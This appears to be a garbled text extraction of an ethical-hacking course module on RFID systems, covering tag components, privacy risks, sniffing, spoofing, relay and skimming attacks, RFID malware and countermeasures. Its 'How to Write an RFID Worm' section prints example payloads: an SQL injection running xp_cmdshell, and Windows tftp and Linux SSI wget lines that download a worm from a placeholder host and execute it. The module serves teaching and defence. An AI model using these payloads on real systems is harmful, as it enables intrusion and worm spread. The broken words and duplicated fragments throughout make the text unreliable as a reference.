Ethical H ackin g an d

Coun term easures

Coun term easures

Version 6

Mo d u le XXXIX

News

Module Objective

This m odule will fam iliarize you with:

• RFID

• Com pon en ts of RFID system s

y

Com pon en ts of RFID system s

• RFID System Architecture

• RFID Collision s

• RFID Risks

RFID Risks

• RFID an d Privacy Issues

• RFID Security an d Privacy Threats

• Vuln erabilities in RFID-en abled Credit Cards

Vuln erabilities in RFID en abled Credit Cards

• RFID H ackin g Tool

Module Flow

RFID RFID an d Privacy Issues

Com pon en ts of RFID system s

RFID Security an d Privacy Threats RFID system s

RFID System Architecture

Privacy Threats

Vuln erabilities in RFID System Architecture

RFID-en abled Credit Cards

RFID Collision s RFID H ackin g Tool

RFID

Radio Frequen cy Iden tification (RFID) is an autom atic iden tification

m ethod

m ethod

It tran sm its iden tity of an object in the form of a un ique serial n um ber

usin g radio waves

g

RFID system s work on the prin ciple of con tactless tran sfer of data

between data carryin g device an d its reader

RFID tags con tain at least two parts:

RFID

• In tegrated circuit to store an d process in form ation , m odulate, an d

dem odulate an (RF) sign al

Com pon en ts of RFID System s

• RFID prem ises server • RFID in tegration server

P i R q i i t l

Gen eral categories of RFID tags:

• Pa s s ive : Requires n o in tern al power source • Active : Requires in tern al power source

(Sm all battery)

• S e m i-p a s s ive ( Ba tte ry-a s s is te d ) :

RFID Collision s

RFID Tag Collision :

• RFID Tag collision happen s when m ultiple tags are

en ergized by RFID tag reader sim ultan eously, an d

reflect their respective sign als back to reader at the

g

reflect their respective sign als back to reader at the

sam e tim e

RFID Reader Collision :

• Reader collision occurs in RFID system s when

coverage area of on e RFID reader overlaps with

RFID Reader Collision :

coverage area of on e RFID reader overlaps with

that of an other reader

• This causes two differen t problem s:

• Sign al in terferen ce

RFID Risks

Busin ess Process Risk

Busin ess In telligen ce Risk

Busin ess In telligen ce Risk

Privacy Risk

• H azards of Electrom agn etic Radiation

Extern ality Risk

RFID Risks: Busin ess Process

Risk

Risk

Direct attacks on RFID system com pon en ts poten tially could un derm in e busin ess processes which the RFID system was design ed to en able

processes, which the RFID system was design ed to en able

RFID system s typically are im plem en ted to replace or en han ce a paper or partially autom ated process

Organ ization s im plem en tin g RFID system s could becom e relian t on those system s

Failure in an y com pon en t or subsystem of RFID system could result in system wide failure

Un like m ost of other risks, busin ess process risk can occur as a result of both hum an action an d n atural causes

RFID Risks: Busin ess

In telligen ce Risk

In telligen ce Risk

RFID supports wireless rem ote access to get in form ation about assets an d

pp

g

people that either previously did n ot exist or was difficult to create or

dyn am ically m ain tain

A com petitor or adversary can gain in form ation from RFID system in a

n um ber of ways:

• Eavesdroppin g on RF lin ks between readers an d tags

• Perform in g in depen den t queries on tags to obtain relevan t data

• Obtain in g un authorized access to a back-en d database which stores in form ation g about tagged item s

RFID Risks: Privacy Risk

Busin ess objectives often con flict with privacy objectives

j

p

y

j

Organ ization s can ben efit from an alysis an d sharin g of person al

in form ation obtain ed with RFID techn ology

b

gy

Privacy risk from the perspective of organ ization

• Pen alties if organ ization does n ot com ply with privacy laws an d regulation s

Privacy risk from the perspective of organ ization

im plem en tin g RFID, m ight in clude:

• Pen alties if organ ization does n ot com ply with privacy laws an d regulation s • Custom er avoidan ce or boycott of organ ization because of real or perceived

privacy con cern s about RFID techn ology

• Bein g held legally liable for an y con sequen ces of weak privacy protection s • Em ployees, shareholders, an d other stakeholders m ight disassociate with Em ployees, shareholders, an d other stakeholders m ight disassociate with

RFID Risks: Privacy Risk (con t’d)

Other factors that im pact the level of

privacy risk in clude:

• Whether person al in form ation is stored on tags

• Whether tagged item s are con sidered person al

privacy risk in clude:

gg

p

• The likelihood that the tag will be in proxim ity of com patible

readers

• Len gth of tim e records are retain ed in an alytic or archival

system s

system s

• Effectiven ess of RFID security con trols, in particular:

• Efficien cy of tag m em ory access con trol an d authen tication

m echan ism s

ec a

s

s

• Ability of tags to be disabled after their use in a busin ess

process

• Ability of users to effectively shield tags to preven t

th

i

d d

t

ti

RFID Risks: Extern ality Risk

RFID system s typically are n ot isolated from other system s an d assets in

RFID system s typically are n ot isolated from other system s an d assets in

en terprise

Extern ality risks can exploit both RF an d en terprise subsystem s of an RFID

system :

• Major extern ality risk for RF subsystem is hazards resultin g from electrom agn etic radiation

• Major extern ality risk for en terprise subsystem is com puter n etwork attacks on t k d d i d li ti

n etworked devices an d application s

As extern ality risk by defin ition in volves risks outside of RFID system ; it is

distin ct for both busin ess process an d busin ess in telligen ce risks

RFID an d Privacy Issues

An y organ ization con tem platin g the use of RFID should first

y

g

p

g

en sure that it is aware of its privacy obligation s un der differen t

laws before it starts accum ulatin g data

RFID attacks used to bypass person al privacy

in form ation are:

• By placin g RFID tags hidden from eyes, an d usin g it for stealth

trackin g

U i

iq

id

tifi

id d b RFID f

fili

d

• Usin g un ique iden tifiers provided by RFID for profilin g and

iden tifyin g con sum er pattern an d behavior

Coun term easures

Methods that are used to avoid RFID attacks:

RSA Blocker Tags:

g

• It helps in m ain tain in g the privacy of con sum er by

spam m in g from an y reader who attem pts to scan

tags without the authorization

Kill S i h

Kill Switches:

RFID Security an d Privacy Threats

Sn iffin g

Trackin g

Spoofin g

Spoofin g

Replay attacks

Sn iffin g

RFID t

d

i

d t b

d bl b

li

t

d

RFID tags are design ed to be readable by an y com plian t reader

It is easy to collect RFID data by eavesdroppin g on wireless RFID

chan n el

Un restricted access to tag data can have serious im plication s

Collected tag data m ight reveal in form ation such as m edical

Trackin g

RFID techn ology facilitates secret m on itorin g of in dividual’s location

RFID techn ology facilitates secret m on itorin g of in dividual s location

an d action s

RFID readers placed in strategic location s can record RFID tag’s un ique

respon ses, this can then be persisten tly associated with a person ’s

iden tity

RFID tags without un ique iden tifiers facilitates trackin g by form in g

Spoofin g

Attackers can m im ic authen tic RFID tags by

Attackers can m im ic authen tic RFID tags by

writin g appropriately form atted data on

blan k RFID tags

Tag clon in g is an other kin d of spoofin g

attack which produces un authorized copies

attack, which produces un authorized copies

of legitim ate RFID tags

Researchers from J ohn s H opkin s Un iversity

recen tly clon ed a

cryptographically-protected Texas In strum en ts digital

i

d

Replay Attacks

RFID relay devices can in tercept an d retran sm it RFID queries, which

e ay de ces ca te cept a d et a s

t

que es,

c

offen ders can use to abuse various RFID application s

En glan d’s n ew RFID-en abled licen se plates, e-Plates is an exam ple of

m odern RFID system that is susceptible to attack by a relay device

Active e-Plate tags con tain an en crypted ID code that is stored in UK

Min istry of Tran sport’s vehicle database

An attacker can record en crypted iden tifier when an other car’s

li

l

i

d

d

l

i l

Den ial-of-service

hi

l i

d

b

k

d d

b

l

Thieves can exploit RFID tags an d back-en d databases to steal

RFID-tagged item s by rem ovin g tags from the item s com pletely or by

puttin g them in a foil lin ed booster bag that blocks RFID readers

query sign als an d tem porarily deactivates the item s

q

y

g

p

y

An other attack takes the opposite approach; floods an RFID system

pp

pp

;

y

with m ore data than it can han dle

Attacker can rem ove RFID tags an d plan t them on other item s,

causin g RFID system s to record useless data, discreditin g, an d

Protection again st RFID Attacks

Cryptography:

• Min im alist cryptography

• H um an -com puter authen tication • H ash locks

• RFID Detektor (http:/ / tin yurl.com / )

• Data Privatizer (https:/ / shop foebud org/ )

Detection an d evasion :

• Data Privatizer (https:/ / shop.foebud.org/ ) • RFID Guardian (www.rfidguardian .org)

Tem porary Deactivation :

• Con sum ers can deactivate their RFID tags to avoid m ost m odern -day threats

RFID Guardian

RFID Guardian is a m obile battery-powered device that offers person al RFID security an d privacy m an agem en t for people

RFID Guardian m on itors an d regulates RFID usage on behalf of custom ers

It is m ean t for person al use an d m an ages the RFID tags within physical proxim ity of a person

It t lik RFID d q i t d d di th t d it l It acts like an RFID reader, queryin g tags, an d decodin g the tag respon ses, an d it can also em ulate an RFID tag, allowin g it to perform direct in -ban d com m un ication s with other RFID readers

RFID Guardian is the in tegration of four separate security

• Auditin g

• Key m an agem en t

RFID Guardian is the in tegration of four separate security properties in to a sin gle device:

RFID Malware

RFID m alware is tran sm itted an d executed via RFID tag:

• Threats arise when crim in als cause valid RFID tags to behave in an un expected ways

• If certain vuln erabilities exist in RFID software, an RFID tag can be in fected with a virus

• When an un suspectin g reader scan s an in fected tag, there is a dan ger of tag exploitin g a vuln erability

Classes of RFID Malware:

• RFID Exploit:

• It is a m alicious RFID tag data that exploits som e vuln erabilities of RFID system

Classes of RFID Malware:

• RFID Worm :

• It is an RFID-based exploit that abuses a n etwork con n ection to achieve self-replication

• RFID Virus:

It i RFID b d l it th t t l lf li t it d t • It is an RFID-based exploit that auton om ously self-replicates its code to

H ow to Write an RFID Virus

Viruses perform s two types of fun ction s, it replicates itself usin g database an d

option ally it executes pay load

p

y

p y

Broadly there are two types of virus replication :

• Database system s usually offer a way to obtain curren t run n in g queries for system adm in istration purposes

• In two version s of virus, on e con tain s sin gle query an d other con tain s m ultiple queries

Replication Usin g Self-Referen tial Queries

In two version s of virus, on e con tain s sin gle query an d other con tain s m ultiple queries • Sin gle query virus requires less features from database, but can n ot carry SQL code as a

payload

• Whereas m ultiple queries require a database that supports SQL load as a payload

R li i U i Q i

• Quin e is a program that prin ts its own source code

• It copies its own source code in to database then it is latter copied on to tags

• Quin e requires m ultiple queries, which m ean s they are n ot supported on all databases

Replication Usin g Quin es

H ow to Write an RFID Worm

Worm is a program that self-propagates across a n etwork, exploitin g

o

s a p og a

t at se

p opagates ac oss a et o

, e p o t

g

security flaws in widely-used services

A RFID

b

l i i

i fl

i

li

An RFID worm propagates by exploitin g security flaws in on lin e

RFID services

RFID worm s do n ot require users to do an y thin g to propagate,

although they spread via RFID tags, if given the opportun ity

• RFID tags are too sm all to carry en tire worm

• Tag con tain s on ly en ough of worm to down load the

rest from the com puter con n ected to In tern et

Propagation :

H ow to Write an RFID Worm

(con t’d)

(con t d)

RFID tag can either in clude bin ary code to down load an d execute worm or shell

com m an ds

Exam ple 1 - Executin g shell com m an ds usin g SQL Server

Apples'; EXEC Master..xp_cmdshell 'shell commands';

Exam ple 2 - Down loadin g an d executin g a worm on Win dows

cd \Windows\Temp & tftp -i <ip> GET worm.exe & worm.exe

Exam ple 3 - Down loadin g an d executin g a worm on Lin ux usin g SSI

<!--#exec cmd="wget http://ip/worm -O /tmp/worm; chmod +x

/tmp/worm; /tmp/worm "-->

Defen din g Again st RFID

Malware

Malware

Lock down RFID user accoun ts an d database accoun ts

Disable or rem ove an y features that are n ot required

To avoid SQL in jection :

• An y data that is copied in to a SQL statem en t should be checked an d escaped usin g the An y data that is copied in to a SQL statem en t should be checked an d escaped usin g the fun ction s provided by database API

• For better security, do n ot copy data in to SQL statem en ts, but use prepared statem en ts an d param eter bin din g

Clien t-side scriptin g can be preven ted by properly escapin g data in serted in to

Clien t-side scriptin g can be preven ted by properly escapin g data in serted in to

H TML pages

RFID Exploits

SQL In jection :

• If RFID m iddleware does n ot process the data read from the tag correctly, it is possible to exploit this vuln erability of database by executin g SQL code that is stored on the tag

Q

j

of database by executin g SQL code that is stored on the tag

Clien t-side Scriptin g:

• Exploitin g dyn am ic features offered by m odern browsers,

Vuln erabilities in RFID-en abled

Credit Cards

Credit Cards

Trackin g Attack

• In this attack, a legitim ate m erchan t exceeds the expected use

of his/ her RFID credit card readers

Trackin g Attack

of his/ her RFID credit card readers

Eavesdroppin g Attack

• In an eavesdroppin g attack, an adversary uses an an ten n a to

record com m un ication between a legitim ate RF device an d

d

reader

• As eavesdroppin g happen s on live com m un ication ; foil

shieldin g does n ot help to preven t this particular attack

• Eavesdroppin g feasibility depen ds on m an y factors in cludin g

d di

Vuln erabilities in RFID-en abled

Credit Cards (con t’d)

Credit Cards (con t d)

Ski

i

A

k

• In this attack, an un authorized an d poten tially clan destin e reader reads tags from either close proxim ity or from a distan ce

Skim m in g Attack

g p y

• J ohn n y Carson attack on RFID credit cards occurs when an attacker has access to physical m ail stream to read RF data from credit cards in tran sit to their own ers

• This attack is particularly powerful because the adversary gain s p y p y g accessory kn owledge such as cardholder address

• A com prom ised reader at a parkin g garage could skim custom er’s credit-card in form ation at sam e tim e that they read the parkin g pass • Fob-type RFID credit cards are n ow available for attachm en t to key

h k h l h k

rin gs, exposin g them to attack when con sum ers leave their keys un atten ded

• This behavior is seen m ost often in valet-parkin g situation s, or in

gym n asium s where it is com m on for users to leave their keys together in an un secured box by the door

Vuln erabilities in RFID-en abled

Credit Cards (con t’d)

Credit Cards (con t d)

Replay an d relay Attack

• In a replay attack, an attacker broadcasts an exact replay of the tran spon der en d of the radio sign al recorded from a past tran saction between an Rfdevice an d a reader

• This attack com m on ly kn own as the relay attack uses a m an in the m iddle • This attack, com m on ly kn own as the relay attack, uses a m an in the m iddle

attack to relay an tran sien t con n ection from a legitim ate reader through on e or m ore adversarial devices to a legitim ate tag which m ay be at a con siderable distan ce

• The distan ce at which the relay attack can succeed is lim ited on ly by the laten cy hi h ill b l d b h k d l

which will be tolerated by the attacked protocol

Cross con tam in ation Attack

• The cross con tam in ation attack occurs when private in form ation such as

cardholder n am e, n um ber, an d expiration date learn ed by an attacker in an RF con text are then used by the attacker in a differen t con text

RFDum p

RFDum p is a tool that allows you to read RFID tags within range, an d to chan ge

p

y

g

g ,

g

an d alter all the data stored in the RFID tag

RFDum p is a backen d GPL tool to directly in teroperate with an y RFID

ISO-Reader to m ake the con ten ts stored on RFID tags accessible

The user data can be displayed an d m odified usin g an H ex an d either an ASCII

editor

Man agem en t Con trols

A m an agem en t con trol in volves oversight of the security of the RFID system

A m an agem en t con trol in volves oversight of the security of the RFID system

The m an agem en t of an organ ization m ight n eed to update existin g policies to

address RFID im plem en tation s

Man agem en t con trols are typically in volved in risk assessm en t, system plan n in g,

an d system acquisition as well as security certification s accreditation s an d

an d system acquisition , as well as security certification s, accreditation s, and

assessm en ts

Operation al Con trols

An operation al con trol in volves the action s perform ed on a daily basis by the

t

’

d

i i t

t

d

system ’s adm inistrators and users

• Physical access con trols restrict access to authorized person n el where

There are several types of operation al con trols:

Physical access con trols restrict access to authorized person n el where the RFID system s are deployed

• Proper placem en t of RF equipm en t helps to avoid in terferen ce an d reduce hazards from electrom agn etic radiation

• Organ ization s can destroy tags after they are n o lon ger useful to

d i f i i h i d

preven t adversaries from gain in g access to their data

• Operator train in g en sures that person n el usin g the system follow appropriate guidelin es an d policies

• In form ation labels an d n otice can in form users of the in ten ded

Techn ical Con trols

A techn ical con trol uses techn ology to m on itor or restrict the action s that can be

perform ed within the system

perform ed within the system

Techn ical con trols are listed specifyin g the stan dards while others are available

on ly in proprietary system s

Man y techn ical con trols related to a tag require the tag to perform addition al

com putation s an d to have addition al volatile m em ory

Techn ical con trols exist for all com pon en ts of RFID system s in cludin g the RF

Techn ical con trols exist for all com pon en ts of RFID system s, in cludin g the RF,

en terprise, an d in ter-en terprise subsystem s

The gen eral types of RF subsystem con trols in clude

con trols to:

• Provide authen tication an d in tegrity services to RFID com pon en ts an d tran saction s

• Protect RF com m un ication between reader an d tag

con trols to:

RFID Security

The tags can be set to have a security bit turn ed on in reserved m em ory block on the tag

Ran dom tran saction IDs should be presen t on rewritable tags

Im proved passwords via persisten t state

M l h i i f d d i h i f h

Mutual authen tication of tag an d reader with privacy for the tag

• PRF Private Authen tication Schem e • TreeBased Private Authen tication

A T Ph T S h • A TwoPhase Tree Schem e

Security to protect the read-write option s

Sum m ary

Radio Frequen cy Iden tification (RFID) is an autom atic iden tification m ethod

RFID tag is an electron ic device that holds data

An RFID reader is a device that is used to in terrogate an RFID tag

RFID station s can read an d update in form ation stored in to the RFID tag

RFID stan dards defin e Air In terface Protocol, Data Con ten t, Con form an ce, an d Application s